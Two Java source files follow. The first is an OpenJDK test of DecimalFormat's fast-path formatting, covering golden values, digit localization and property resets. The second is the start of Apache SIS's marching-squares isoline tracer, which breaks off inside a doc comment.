/* * Copyright (c) 2012, Oracle and/or its affiliates. All rights reserved. * DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER. * * This code is free software; you can redistribute it and/or modify it * under the terms of the GNU General Public License version 2 only, as * published by the Free Software Foundation. * * This code is distributed in the hope that it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License * version 2 for more details (a copy is included in the LICENSE file that * accompanied this code). * * You should have received a copy of the GNU General Public License version * 2 along with this work; if not, write to the Free Software Foundation, * Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. * * Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA * or visit www.oracle.com if you need additional information or have any * questions. */ /* @test * @bug 7050528 * @summary Test java.text.DecimalFormat fast-path for format(double...) * @author Olivier Lagneau * @run main RoundingAndPropertyTest * */ /* ----------------------------------------------------------------------------- * Note : * Since fast-path algorithm does not modify any feature of DecimalFormat, * some tests or values in this program may have to be adapted/added/removed * when any change has been done in the fast-path source code, because the * conditions for exercising fast-path may change. * * This is specially true if the set of constraints to fall in the fast-path * case is relaxed in any manner. * * Usage : * - Run main without any argument to test against a set of golden values and * associated results hard-coded in the source code. That will do the tests * described below * See below comment section named "Description". 
* * or * * - Run main with string argument "-gengold" to output source code of * GoldenFormattedValues.java class file with the jdk version used while * generating the code. * See below comment section named : "Modifying Golden Values". * * In case of error while running the test, a Runtime exception is generated * providing the numbers of errors detected (format of golden values checks and * property changes checks), and the program exit. * * Description : * * This test first checks that localization of digits is done correctly when * calling DecimalFormat.format() on the array of values DecimalLocalizationValues * found in GoldenDoubleValues, using the locale FullLocalizationTestLocale * (from GoldenDoubleValues) that implies localization of digits. it checks the * the results against expected returned string. In case of formatting error, * it provides a message informing which value was wrongly formatted. * * Then it checks the results of calling NumberFormat.format(double) on a set * of predefined golden values and checks results against expected returned * string. It does this both for the decimal case, with an instance returned * NumberFormat.getInstance() call and for the currency case, with an instance * returned by NumberFormat.getCurrencyInstance(). Almost all the tested double * values satisfy the constraints assumed by the fast-path algorithm for * format(double ...). Some are voluntarily outside the scope of fast-path to * check that the algorithm correctly eliminate them. In case of formatting * error a message provides information on the golden value raising the error * (value, exact decimal value (using BidDecimal), expected result, formatted result). * * Last the test checks the status and behavior of a DecimalFormat instance * when changing properties that make this instance satisfy/invalidate its * fast-path status, depending on the predefined set of fast-path constraints. 
* * The golden results are predefined arrays of int[] containing the unicode * ints of the chars in the expected formatted string, when using locale * provided in GoldenDoubleValues class. The results are those obtained by * using a reference jdk version (for example one that does not contains the * DecimalFormat fast-path algorithm, like jdk80-b25). * * The double values from which we get golden results are stored inside two * arrays of double values: * - DecimalGoldenValues for testing NumberFormat.getInstance(). * - CurrencyGoldenValues for testing NumberFormat.getCurrencyInstance(). * These arrays are located in GoldenDoubleValues.java source file. * * For each double value in the arrays above, there is an associated golden * result. These results are stored in arrays of int[]: * - DecimalGoldenFormattedValues for expected decimal golden results. * - CurrencyGoldenFormattedValues for expected currency golden results. * - DecimalDigitsLocalizedFormattedValues for expected localized digit results. * * We store the results in int[] arrays containing the expected unicode values * because the compiler that will compile the containing java file may use a * different locale than the one registered in GoldenDoubleValues.java. These * arrays are located in a separate GoldenFormattedValues.java source file * that is generated by RoundingAndPropertyTest using "-gengold" parameter. * See below "Modifying Golden Values". * * The golden value arrays can be expanded, modified ... to test additional * or different double values. In that case, the source file of class * GoldenFormattedValues must be regenerated to replace the existing one.. * * Modifying Golden Values : * * In order to ease further modification of the list of double values checked * and associated golden results, the test includes the method * generatesGoldenFormattedValuesClass() that writes on standard output stream * the source code for GoldenFormattedValues class that includes the expected * results arrays. 
* * Here are the steps to follow for updating/modifying golden values and results: * 1- Edit GoldenDoubleValues.java to add/remove/modify golden or localization * values. * 2- Run main with "-gengold" string argument with a target jdk. * (at the creation of this test file, the target jdk used was jdk1.8.0-ea). * 2- Copy this java code that has been writen on standard output and replace * GoldenFormattedValues.java contents by the generated output. * 3- Check that this updated code compiles. * [4]- If needed replaces existing GoldenDoubleValues and GoldenFormattedValues * files in jdk/test section, respectively by the one modified at step 1 and * generated at step 2. * ----------------------------------------------------------------------------- */ import java.util.*; import java.text.NumberFormat; import java.text.DecimalFormat; import java.text.DecimalFormatSymbols; import java.math.RoundingMode; import java.math.BigDecimal; public class RoundingAndPropertyTest { // Prints on standard output stream the unicode values of chars as a // comma-separated list of int values private static void printUnicodeValuesArray(char[] chars) { for (int i = 0; i < chars.length; i++) { System.out.print((int) chars[i]); if (i != (chars.length - 1)) System.out.print(", "); } } // Converts given array of unicode values as an array of chars. // Returns this converted array. private static char[] getCharsFromUnicodeArray(int[] unicodeValues) { char[] chars = new char[unicodeValues.length]; for (int i = 0; i < unicodeValues.length; i++) { chars[i] = (char) unicodeValues[i]; } return chars; } /* Prints on standard output stream the java code of resulting * GoldenFormattedValues class for the golden values found in * class GoldenDoubleValues. */ private static void generatesGoldenFormattedValuesClass() { String fourWhiteSpaces = " "; String eightWhiteSpaces = " "; // Prints header without Copyright header. 
System.out.println("/* This is a machine generated file - Please DO NOT EDIT !"); System.out.println(" * Change RoundingAndPropertyTest instead,"); System.out.println(" * and run with \"-gengold\" argument to regenerate (without copyright header)."); System.out.println(" */"); System.out.println(); System.out.println("/* This file contains the set of result Strings expected from calling inside"); System.out.println(" * RoundingAndPropertyTest the method NumberFormat.format() upon the set of"); System.out.println(" * double values provided in GoldenDoubleValues.java. It contains three arrays,"); System.out.println(" * each containing arrays of unicode values representing the expected string"); System.out.println(" * result when calling format() on the corresponding (i.e. same index) double"); System.out.println(" * value found in GoldenDoubleValues arrays :"); System.out.println(" * - DecimalDigitsLocalizedFormattedValues corresponds to DecimalLocalizationValues,"); System.out.println(" * when using FullLocalizationTestLocale to format."); System.out.println(" * - DecimalGoldenFormattedValues corresponds to DecimalGoldenValues, when used"); System.out.println(" * in the decimal pattern case together with TestLocale."); System.out.println(" * - CurrencyGoldenFormattedValues corresponds to CurrencyGoldenValues. when used"); System.out.println(" * in the currency pattern case together with TestLocale."); System.out.println(" * Please see documentation in RoundingAndPropertyTest.java for more details."); System.out.println(" *"); System.out.println(" * This file generated by running RoundingAndPropertyTest with \"-gengold\" argument."); System.out.println(" */"); System.out.println(); // Prints beginning of class GoldenFormattedValues. 
System.out.println("class GoldenFormattedValues {"); System.out.println(); System.out.println( fourWhiteSpaces + "// The formatted values below were generated from golden values"); System.out.print( fourWhiteSpaces + "// listed in GoldenDoubleValues.java,"); System.out.println(" using the following jvm version :"); System.out.println( fourWhiteSpaces + "// " + System.getProperty("java.vendor") + " " + System.getProperty("java.vm.name") + " " + System.getProperty("java.version")); System.out.println( fourWhiteSpaces + "// locale for golden double values : " + GoldenDoubleValues.TestLocale); System.out.println( fourWhiteSpaces + "// locale for testing digit localization : " + GoldenDoubleValues.FullLocalizationTestLocale); System.out.println(); // Prints the expected results when digit localization happens System.out.println( fourWhiteSpaces + "// The array of int[] unicode values storing the expected results"); System.out.print( fourWhiteSpaces + "// when experiencing full localization of digits"); System.out.println(" on DecimalLocalizationValues."); System.out.println( fourWhiteSpaces + "static int[][] DecimalDigitsLocalizedFormattedValues = {"); NumberFormat df = NumberFormat.getInstance(GoldenDoubleValues.FullLocalizationTestLocale); for (int i = 0; i < GoldenDoubleValues.DecimalLocalizationValues.length; i++) { double d = GoldenDoubleValues.DecimalLocalizationValues[i]; String formatted = df.format(d); char[] decFmtChars = formatted.toCharArray(); System.out.print(eightWhiteSpaces + "{ "); printUnicodeValuesArray(decFmtChars); System.out.println(" },"); } System.out.println(fourWhiteSpaces + "};"); System.out.println(); // Prints the golden expected results for the decimal pattern case System.out.println( fourWhiteSpaces + "// The array of int[] unicode values storing the expected results"); System.out.print( fourWhiteSpaces + "// when calling Decimal.format(double)"); System.out.println(" on the decimal GoldenDoubleValues."); System.out.println( 
fourWhiteSpaces + "static int[][] DecimalGoldenFormattedValues = {"); df = NumberFormat.getInstance(GoldenDoubleValues.TestLocale); for (int i = 0; i < GoldenDoubleValues.DecimalGoldenValues.length; i++) { double d = GoldenDoubleValues.DecimalGoldenValues[i]; String formatted = df.format(d); char[] decFmtChars = formatted.toCharArray(); System.out.print(eightWhiteSpaces + "{ "); printUnicodeValuesArray(decFmtChars); System.out.println(" },"); } System.out.println(fourWhiteSpaces + "};"); System.out.println(); // Prints the golden expected results for the currency pattern case System.out.println( fourWhiteSpaces + "// The array of int[] unicode values storing the expected results"); System.out.print( fourWhiteSpaces + "// when calling Decimal.format(double)"); System.out.println(" on the currency GoldenDoubleValues."); System.out.println( fourWhiteSpaces + "static int[][] CurrencyGoldenFormattedValues = {"); NumberFormat cf = NumberFormat.getCurrencyInstance(GoldenDoubleValues.TestLocale); for (int i = 0; i < GoldenDoubleValues.CurrencyGoldenValues.length; i++) { double d = GoldenDoubleValues.CurrencyGoldenValues[i]; String formatted = cf.format(d); char[] decFmtChars = formatted.toCharArray(); System.out.print(eightWhiteSpaces + "{ "); printUnicodeValuesArray(decFmtChars); System.out.println(" },"); } System.out.println(fourWhiteSpaces + "};"); System.out.println(); // Prints end of GoldenFormattedValues class. 
System.out.println("}"); } private static int testLocalizationValues() { DecimalFormat df = (DecimalFormat) NumberFormat.getInstance(GoldenDoubleValues.FullLocalizationTestLocale); double[] localizationValues = GoldenDoubleValues.DecimalLocalizationValues; int size = localizationValues.length; int successCounter = 0; int failureCounter = 0; for (int i = 0; i < size; i++) { double d = localizationValues[i]; String formatted = df.format(d); char[] expectedUnicodeArray = getCharsFromUnicodeArray( GoldenFormattedValues.DecimalDigitsLocalizedFormattedValues[i]); String expected = new String(expectedUnicodeArray); if (!formatted.equals(expected)) { failureCounter++; System.out.println( "--- Localization error for value d = " + d + ". Exact value = " + new BigDecimal(d).toString() + ". Expected result = " + expected + ". Output result = " + formatted); } else successCounter++; } System.out.println("Checked positively " + successCounter + " golden decimal values out of " + size + " tests. There were " + failureCounter + " format failure"); return failureCounter; } private static int testGoldenValues(java.text.DecimalFormat df, java.text.DecimalFormat cf) { double[] goldenDecimalValues = GoldenDoubleValues.DecimalGoldenValues; int decimalSize = goldenDecimalValues.length; int decimalSuccessCounter = 0; int decimalFailureCounter = 0; for (int i = 0; i < decimalSize; i++) { double d = goldenDecimalValues[i]; String formatted = df.format(d); char[] expectedUnicodeArray = getCharsFromUnicodeArray( GoldenFormattedValues.DecimalGoldenFormattedValues[i]); String expected = new String(expectedUnicodeArray); if (!formatted.equals(expected)) { decimalFailureCounter++; System.out.println( "--- Error for golden value d = " + d + ". Exact value = " + new BigDecimal(d).toString() + ". Expected result = " + expected + ". 
Output result = " + formatted); } else decimalSuccessCounter++; } System.out.println("Checked positively " + decimalSuccessCounter + " golden decimal values out of " + decimalSize + " tests. There were " + decimalFailureCounter + " format failure"); double[] goldenCurrencyValues = GoldenDoubleValues.CurrencyGoldenValues; int currencySize = goldenCurrencyValues.length; int currencySuccessCounter = 0; int currencyFailureCounter = 0; for (int i = 0; i < currencySize; i++) { double d = goldenCurrencyValues[i]; String formatted = cf.format(d); char[] expectedUnicodeArray = getCharsFromUnicodeArray( GoldenFormattedValues.CurrencyGoldenFormattedValues[i]); String expected = new String(expectedUnicodeArray); if (!formatted.equals(expected)) { currencyFailureCounter++; System.out.println( "--- Error for golden value d = " + d + ". Exact value = " + new BigDecimal(d).toString() + ". Expected result = " + expected + ". Output result = " + formatted); } else currencySuccessCounter++; } System.out.println("Checked positively " + currencySuccessCounter + " golden currency values out of " + currencySize + " tests. There were " + currencyFailureCounter + " format failure"); return (decimalFailureCounter + currencyFailureCounter); } // Checks that the two passed s1 and s2 string are equal, and prints // out message in case of error. private static boolean resultsEqual(String propertyName, String s1, String s2) { boolean equality = s1.equals(s2); if (!equality) System.out.println( "\n*** Error while reverting to default " + propertyName + " property.\n" + " initial output = " + s1 + ". reverted output = " + s2 + "."); else System.out.println(" Test passed."); return equality; } /* This methods checks the behaviour of the management of properties * of a DecimalFormat instance that satisfies fast-path constraints. 
* * It does this by comparing the results of the format(double) output * obtained from initial fast-path state with the output provided by * the same instance that has been pushed and exercised outside * fast-path rules and finally "reverted" to its initial fast-path state. * * The schema of actions is this : * - Call format(double) on a known DecimalFormat fast-path instance, * and store this result. * - Record the current state of a given property. * - Change the property to invalidate the fast-path state. * - Call again format(double) on the instance. * - Revert state of property to validate again fast-path context. * - Call format(double) again. * - Check that first and last call to format(double) provide same result * - Record failure if any. * - Do the same for another property with the same instance. * So all the property changes are chained one after the other on only the * same instance. * * Some properties that currently do not influence the fast-path state * are also tested. This is not useful with current fast-path source * but is here for testing the whole set of properties. This is the case * for prefixes and suffixes, and parseBigDecimal properties. 
*/ private static int testSettersAndFastPath(DecimalFormat df, boolean isCurrency) { final double d1 = GoldenDoubleValues.PROPERTY_CHECK_POSITIVE_VALUE; final double d2 = GoldenDoubleValues.PROPERTY_CHECK_NEGATIVE_VALUE; int errors = 0; boolean testSucceeded = false; String firstFormatResult; String secondFormatResult; String propertyName; // ---- positivePrefix property test ---- testSucceeded = false; propertyName = "positivePrefix"; System.out.print("Checking " + propertyName + " property."); String initialPrefix = df.getPositivePrefix(); firstFormatResult = df.format(d1); df.setPositivePrefix("positivePrefix:"); df.format(d1); df.setPositivePrefix(initialPrefix); secondFormatResult = df.format(d1); testSucceeded = resultsEqual(propertyName, firstFormatResult, secondFormatResult); if (!testSucceeded) errors++; // ---- positiveSuffix property test ---- testSucceeded = false; propertyName = "positiveSuffix"; System.out.print("Checking " + propertyName + " property."); String initialSuffix = df.getPositiveSuffix(); firstFormatResult = df.format(d1); df.setPositiveSuffix("positiveSuffix:"); df.format(d1); df.setPositiveSuffix(initialSuffix); secondFormatResult = df.format(d1); testSucceeded = resultsEqual(propertyName,firstFormatResult, secondFormatResult); if (!testSucceeded) errors++; // ---- negativePrefix property test ---- testSucceeded = false; propertyName = "negativePrefix"; System.out.print("Checking " + propertyName + " property."); initialPrefix = df.getNegativePrefix(); firstFormatResult = df.format(d1); df.setNegativePrefix("negativePrefix:"); df.format(d1); df.setNegativePrefix(initialPrefix); secondFormatResult = df.format(d1); testSucceeded = resultsEqual(propertyName, firstFormatResult, secondFormatResult); if (!testSucceeded) errors++; // ---- negativeSuffix property test ---- testSucceeded = false; propertyName = "negativeSuffix"; System.out.print("Checking " + propertyName + " property."); initialSuffix = df.getNegativeSuffix(); firstFormatResult 
= df.format(d1); df.setNegativeSuffix("negativeSuffix:"); df.format(d1); df.setNegativeSuffix(initialSuffix); secondFormatResult = df.format(d1); testSucceeded = resultsEqual(propertyName, firstFormatResult, secondFormatResult); if (!testSucceeded) errors++; // ---- multiplier property test ---- testSucceeded = false; propertyName = "multiplier"; System.out.print("Checking " + propertyName + " property."); int initialMultiplier = df.getMultiplier(); firstFormatResult = df.format(d1); df.setMultiplier(10); df.format(d1); df.setMultiplier(initialMultiplier); secondFormatResult = df.format(d1); testSucceeded = resultsEqual(propertyName, firstFormatResult, secondFormatResult); if (!testSucceeded) errors++; // ---- groupingUsed property test ---- testSucceeded = false; propertyName = "groupingUsed"; System.out.print("Checking " + propertyName + " property."); boolean initialGroupingUsed = df.isGroupingUsed(); firstFormatResult = df.format(d1); df.setGroupingUsed(!initialGroupingUsed); df.format(d1); df.setGroupingUsed(initialGroupingUsed); secondFormatResult = df.format(d1); testSucceeded = resultsEqual(propertyName, firstFormatResult, secondFormatResult); if (!testSucceeded) errors++; // ---- groupingSize property test ---- testSucceeded = false; propertyName = "groupingSize"; System.out.print("Checking " + propertyName + " property."); int initialGroupingSize = df.getGroupingSize(); firstFormatResult = df.format(d1); df.setGroupingSize(initialGroupingSize + 1); df.format(d1); df.setGroupingSize(initialGroupingSize); secondFormatResult = df.format(d1); testSucceeded = resultsEqual(propertyName, firstFormatResult, secondFormatResult); if (!testSucceeded) errors++; // ---- decimalSeparatorAlwaysShown property test ---- testSucceeded = false; propertyName = "decimalSeparatorAlwaysShown"; System.out.print("Checking " + propertyName + " property."); boolean initialDSShown = df.isDecimalSeparatorAlwaysShown(); firstFormatResult = df.format(d1); 
df.setDecimalSeparatorAlwaysShown(!initialDSShown); df.format(d1); df.setDecimalSeparatorAlwaysShown(initialDSShown); secondFormatResult = df.format(d1); testSucceeded = resultsEqual(propertyName, firstFormatResult, secondFormatResult); if (!testSucceeded) errors++; // ---- parseBigDecimal property test ---- testSucceeded = false; propertyName = "parseBigDecimal"; System.out.print("Checking " + propertyName + " property."); boolean initialParseBigdecimal = df.isParseBigDecimal(); firstFormatResult = df.format(d1); df.setParseBigDecimal(!initialParseBigdecimal); df.format(d1); df.setParseBigDecimal(initialParseBigdecimal); secondFormatResult = df.format(d1); testSucceeded = resultsEqual(propertyName, firstFormatResult, secondFormatResult); if (!testSucceeded) errors++; // ---- maximumIntegerDigits property test ---- testSucceeded = false; propertyName = "maximumIntegerDigits"; System.out.print("Checking " + propertyName + " property."); int initialMaxIDs = df.getMaximumIntegerDigits(); firstFormatResult = df.format(d1); df.setMaximumIntegerDigits(8); df.format(d1); df.setMaximumIntegerDigits(initialMaxIDs); secondFormatResult = df.format(d1); testSucceeded = resultsEqual(propertyName, firstFormatResult, secondFormatResult); if (!testSucceeded) errors++; // ---- minimumIntegerDigits property test ---- testSucceeded = false; propertyName = "minimumIntegerDigits"; System.out.print("Checking " + propertyName + " property."); int initialMinIDs = df.getMinimumIntegerDigits(); firstFormatResult = df.format(d1); df.setMinimumIntegerDigits(2); df.format(d1); df.setMinimumIntegerDigits(initialMinIDs); secondFormatResult = df.format(d1); testSucceeded = resultsEqual(propertyName, firstFormatResult, secondFormatResult); if (!testSucceeded) errors++; // ---- maximumFractionDigits property test ---- testSucceeded = false; propertyName = "maximumFractionDigits"; System.out.print("Checking " + propertyName + " property."); firstFormatResult = df.format(d1); 
df.setMaximumFractionDigits(8); df.format(d1); if (isCurrency) { df.setMinimumFractionDigits(2); df.setMaximumFractionDigits(2); } else { df.setMinimumFractionDigits(0); df.setMaximumFractionDigits(3); } secondFormatResult = df.format(d1); testSucceeded = resultsEqual(propertyName, firstFormatResult, secondFormatResult); if (!testSucceeded) errors++; // ---- minimumFractionDigits property test ---- testSucceeded = false; propertyName = "minimumFractionDigits"; System.out.print("Checking " + propertyName + " property."); firstFormatResult = df.format(d1); df.setMinimumFractionDigits(1); df.format(d1); if (isCurrency) { df.setMinimumFractionDigits(2); df.setMaximumFractionDigits(2); } else { df.setMinimumFractionDigits(0); df.setMaximumFractionDigits(3); } secondFormatResult = df.format(d1); testSucceeded = resultsEqual(propertyName, firstFormatResult, secondFormatResult); if (!testSucceeded) errors++; // ---- currency property test ---- testSucceeded = false; propertyName = "currency"; System.out.print("Checking " + propertyName + " property."); Currency initialCurrency = df.getCurrency(); Currency japanCur = java.util.Currency.getInstance(Locale.JAPAN); firstFormatResult = df.format(d1); df.setCurrency(japanCur); df.format(d1); df.setCurrency(initialCurrency); secondFormatResult = df.format(d1); testSucceeded = resultsEqual(propertyName, firstFormatResult, secondFormatResult); if (!testSucceeded) errors++; // ---- roundingMode property test ---- testSucceeded = false; propertyName = "roundingMode"; System.out.print("Checking " + propertyName + " property."); RoundingMode initialRMode = df.getRoundingMode(); firstFormatResult = df.format(d1); df.setRoundingMode(RoundingMode.HALF_UP); df.format(d1); df.setRoundingMode(RoundingMode.HALF_EVEN); secondFormatResult = df.format(d1); testSucceeded = resultsEqual(propertyName, firstFormatResult, secondFormatResult); if (!testSucceeded) errors++; // ---- decimalFormatSymbols property test ---- testSucceeded = false; 
propertyName = "decimalFormatSymbols"; System.out.print("Checking " + propertyName + " property."); DecimalFormatSymbols initialDecimalFormatSymbols = df.getDecimalFormatSymbols(); firstFormatResult = df.format(d1); Locale bizarreLocale = new Locale("fr", "FR"); DecimalFormatSymbols unusualSymbols = new DecimalFormatSymbols(bizarreLocale); unusualSymbols.setDecimalSeparator('@'); unusualSymbols.setGroupingSeparator('|'); df.setDecimalFormatSymbols(unusualSymbols); df.format(d1); df.setDecimalFormatSymbols(initialDecimalFormatSymbols); secondFormatResult = df.format(d1); testSucceeded = resultsEqual(propertyName, firstFormatResult, secondFormatResult); if (!testSucceeded) errors++; testSucceeded = false; System.out.print("Checking " + propertyName + " property."); initialDecimalFormatSymbols = df.getDecimalFormatSymbols(); firstFormatResult = df.format(d1); Locale japanLocale = Locale.JAPAN; unusualSymbols = new DecimalFormatSymbols(japanLocale); unusualSymbols.setDecimalSeparator('9'); unusualSymbols.setGroupingSeparator('0'); df.setDecimalFormatSymbols(unusualSymbols); df.format(d1); df.setDecimalFormatSymbols(initialDecimalFormatSymbols); secondFormatResult = df.format(d1); testSucceeded = resultsEqual(propertyName, firstFormatResult, secondFormatResult); if (!testSucceeded) errors++; return errors; } // Main for RoundingAndPropertyTest. We test first the golden values, // and then the property setters and getters. 
public static void main(String[] args) { if ((args.length >= 1) && (args[0].equals("-gengold"))) generatesGoldenFormattedValuesClass(); else { System.out.println("\nChecking correctness of formatting with digit localization."); System.out.println("============================================================="); int localizationErrors = testLocalizationValues(); if (localizationErrors != 0) System.out.println("*** Failure in localization tests : " + localizationErrors + " errors detected "); else System.out.println(" Tests for full localization of digits all passed."); DecimalFormat df = (DecimalFormat) NumberFormat.getInstance(GoldenDoubleValues.TestLocale); DecimalFormat cf = (DecimalFormat) NumberFormat.getCurrencyInstance(GoldenDoubleValues.TestLocale); System.out.println("\nChecking correctness of formating for golden values."); System.out.println("============================================================="); int goldenValuesErrors = testGoldenValues(df,cf); if (goldenValuesErrors != 0) System.out.println("*** Failure in goldenValues tests : " + goldenValuesErrors + " errors detected "); else System.out.println(" Tests for golden values all passed."); System.out.println("\nChecking behavior of property changes for decimal case."); System.out.println("============================================================="); int decimalTestsErrors = testSettersAndFastPath(df, false); if (decimalTestsErrors != 0) System.out.println("*** Failure in decimal property changes tests : " + decimalTestsErrors + " errors detected "); else System.out.println(" Tests for decimal property changes all passed."); System.out.println("\nChecking behavior of property changes for currency case."); System.out.println("============================================================="); int currencyTestsErrors = testSettersAndFastPath(cf, true); if (currencyTestsErrors != 0) System.out.println("*** Failure in currency property changes tests : " + currencyTestsErrors + " errors detected "); 
else System.out.println(" Tests for currency property chamges all passed."); if ((localizationErrors > 0) || (goldenValuesErrors > 0) || (decimalTestsErrors > 0) || (currencyTestsErrors > 0)) throw new RuntimeException( "Failed with " + (localizationErrors + goldenValuesErrors + decimalTestsErrors + currencyTestsErrors) + " error(s)."); } } }
apache/sis
34,811
endorsed/src/org.apache.sis.feature/main/org/apache/sis/image/processing/isoline/Tracer.java
/*
 * Licensed to the Apache Software Foundation (ASF) under one or more
 * contributor license agreements.  See the NOTICE file distributed with
 * this work for additional information regarding copyright ownership.
 * The ASF licenses this file to You under the Apache License, Version 2.0
 * (the "License"); you may not use this file except in compliance with
 * the License.  You may obtain a copy of the License at
 *
 *     http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */
package org.apache.sis.image.processing.isoline;

import java.util.Map;
import java.util.HashMap;
import java.util.IdentityHashMap;
import java.awt.Point;
import java.awt.Rectangle;
import java.awt.Shape;
import java.awt.geom.Path2D;
import org.opengis.referencing.operation.MathTransform;
import org.opengis.referencing.operation.TransformException;
import org.apache.sis.geometry.wrapper.j2d.PathBuilder;
import org.apache.sis.util.Debug;


/**
 * Iterator over contouring grid cells together with an interpolator and an assembler of polyline segments.
 * A single instance of this class is created by {@code Isolines.generate(…)} for all bands to process in a
 * given image. {@code Tracer} is used for doing a single iteration over all image pixels.
 *
 * @author Johann Sorel (Geomatys)
 * @author Martin Desruisseaux (Geomatys)
 *
 * @see <a href="https://en.wikipedia.org/wiki/Marching_squares">Marching squares on Wikipedia</a>
 */
final class Tracer {
    /**
     * Mask to apply on {@link Level#isDataAbove} for telling that value in a corner is higher than the level value.
     * Values are defined in {@code PixelIterator.Window} iteration order: from left to right, then top to bottom.
     *
     * <p>Note: there is some hard-coded dependencies to those exact values.
     * If values are changed, search for example for {@code log2(UPPER_RIGHT)} in comments.</p>
     */
    static final int UPPER_LEFT = 1, UPPER_RIGHT = 2, LOWER_LEFT = 4, LOWER_RIGHT = 8;

    /**
     * The 2×2 window containing pixel values in the 4 corners of current contouring grid cell.
     * Values are always stored with band index varying fastest, then column index, then row index.
     * The length of this array is <var>(number of bands)</var> × 2 (width) × 2 (height).
     */
    private final double[] window;

    /**
     * Increment to the position for reading next sample value.
     * It corresponds to the number of bands in {@link #window}.
     */
    private final int pixelStride;

    /**
     * Pixel coordinate on the left side of the cell where to interpolate.
     * The range is 0 inclusive to {@code domain.width} exclusive.
     */
    int x;

    /**
     * Pixel coordinate on the top side of the cell where to interpolate.
     * The range is 0 inclusive to {@code domain.height} exclusive.
     */
    int y;

    /**
     * Translation to apply on coordinates. For isolines computed sequentially, this is the image origin
     * (often 0,0 but not necessarily). For isolines computed in parallel, the translations are different
     * for each computation tile.
     */
    private final double translateX, translateY;

    /**
     * Final transform to apply on coordinates (integer source coordinates at pixel centers).
     * Can be {@code null} if none.
     */
    private final MathTransform gridToCRS;

    /**
     * Creates a new position for the given data window.
     *
     * @param  window       the 2×2 window containing pixel values in the 4 corners of current contouring grid cell.
     * @param  pixelStride  increment to the position in {@code window} for reading next sample value.
     * @param  domain       pixel coordinates where iteration will happen.
     * @param  gridToCRS    final transform to apply on coordinates (integer source coordinates at pixel centers).
     */
    Tracer(final double[] window, final int pixelStride, final Rectangle domain, final MathTransform gridToCRS) {
        this.window      = window;
        this.pixelStride = pixelStride;
        this.translateX  = domain.x;
        this.translateY  = domain.y;
        this.gridToCRS   = gridToCRS;
    }

    /**
     * Builder of polylines for a single level. The segments to create are determined by a set
     * of {@linkplain #isDataAbove four flags} (one for each corner) encoded in an integer.
     * The meaning of those flags is described in Wikipedia "Marching squares" article,
     * except that this implementation uses different values.
     */
    final class Level {
        /**
         * Band number where to read values in the {@link #window} array.
         */
        private final int band;

        /**
         * The level value.
         *
         * @see #interpolate(int, int)
         */
        final double value;

        /**
         * Bitset telling which corners have a value greater than this isoline level {@linkplain #value}.
         * Each corner is associated to one of the bits illustrated below, where bit (0) is the less significant.
         * Note that this bit order is different than the order used in Wikipedia "Marching squares" article.
         * The order used in this class allows more direct bitwise operations as described in next section.
         *
         * <pre class="text">
         *     (0)╌╌╌(1)
         *      ╎     ╎
         *     (2)╌╌╌(3)</pre>
         *
         * Bits are set to 1 where the data value is above the isoline {@linkplain #value}, and 0 where the data value
         * is below the isoline value. Data values exactly equal to the isoline value are handled as if they were greater.
         * It does not matter for interpolations: we could flip this convention randomly, the interpolated points would
         * still be the same. It could change the way line segments are assembled in a single {@link PolylineBuffer},
         * but the algorithm stays consistent if we always apply the same rule for all points.
         *
         * <h4>Reusing bits from previous iteration</h4>
         * We will iterate on pixels from left to right, then from top to bottom. With that iteration order,
         * bits 0 and 2 can be obtained from the bit pattern of previous iteration with a simple bit shift.
         *
         * @see #UPPER_LEFT
         * @see #UPPER_RIGHT
         * @see #LOWER_LEFT
         * @see #LOWER_RIGHT
         */
        int isDataAbove;

        /**
         * The polyline to be continued on the next column. This is a single instance because iteration happens
         * from left to right before top to bottom. This instance is non-empty if the cell in previous iteration
         * was like below (all those examples have a line crossing the right border):
         *
         * <pre class="text">
         *     ●╌╌╌╌╌╌●              ○╌╱╌╌╌╌●╱      ○╌╌╌╌╲╌●
         *     ╎      ╎              ╎╱     ╱       ╎     ╲╎
         *    ─┼──────┼─             ╱     ╱╎       ╎      ╲
         *     ○╌╌╌╌╌╌○             ╱●╌╌╌╌╱╌○       ○╌╌╌╌╌╌○╲</pre>
         *
         * This field {@link PolylineBuffer#isEmpty() is empty} if the cell in previous iteration was like below
         * (no line cross the right border):
         *
         * <pre class="text">
         *     ○╌╲╌╌╌╌●        ○╌╌╌┼╌╌●
         *     ╎  ╲   ╎        ╎   │  ╎
         *     ╎   ╲  ╎        ╎   │  ╎
         *     ○╌╌╌╌╲╌●        ○╌╌╌┼╌╌●</pre>
         */
        private final PolylineBuffer polylineOnLeft;

        /**
         * The polylines in each column which need to be continued on the next row.
         * This array contains empty instances in columns where there are no polylines to continue on next row.
         * For non-empty element at index <var>x</var>, values on the left border are given by pixels at coordinate
         * {@code x} and values on the right border are given by pixels at coordinate {@code x+1}. Example:
         *
         * <pre class="text">
         *            ○╌╌╌╌╌╌●╱
         *            ╎ Top  ╱
         *            ╎ [x] ╱╎
         *     ●╌╌╌╌╌╌●╌╌╌╌╱╌○
         *     ╎ Left ╎██████╎ ← Cell where to create a segment
         *    ─┼──────┼██████╎
         *     ○╌╌╌╌╌╌○╌╌╌╌╌╌○
         *            ↑
         *     x coordinate of first pixel (upper-left corner)</pre>
         */
        private final PolylineBuffer[] polylinesOnTop;

        /**
         * Paths that have not yet been closed. The {@link PolylineBuffer} coordinates are copied in this map when
         * iteration finished on a row but the polyline under construction will not be continued by the next row,
         * or when the {@link #closeLeftWithTop(PolylineBuffer)} method has been invoked but the geometry to close
         * is still not complete. This map accumulates those partial shapes for assembling them later when missing
         * parts become available.
         *
         * <h4>Map keys</h4>
         * Keys are grid coordinates rounded toward 0. The coordinate having fraction digits has its bits inverted
         * by the {@code ~} operator. For each point, there is at most one coordinate having such fraction digits.
         *
         * <h4>Map values</h4>
         * {@code Fragments} instances are list of {@code double[]} arrays to be concatenated in a single polygon later.
         * For a given {@code Fragments} list, all {@code double[]} arrays at even indices shall have their points read
         * in reverse order and all {@code double[]} arrays at odd indices shall have their points read in forward order.
         * The list may contain null elements when there is no data in the corresponding iteration order.
         *
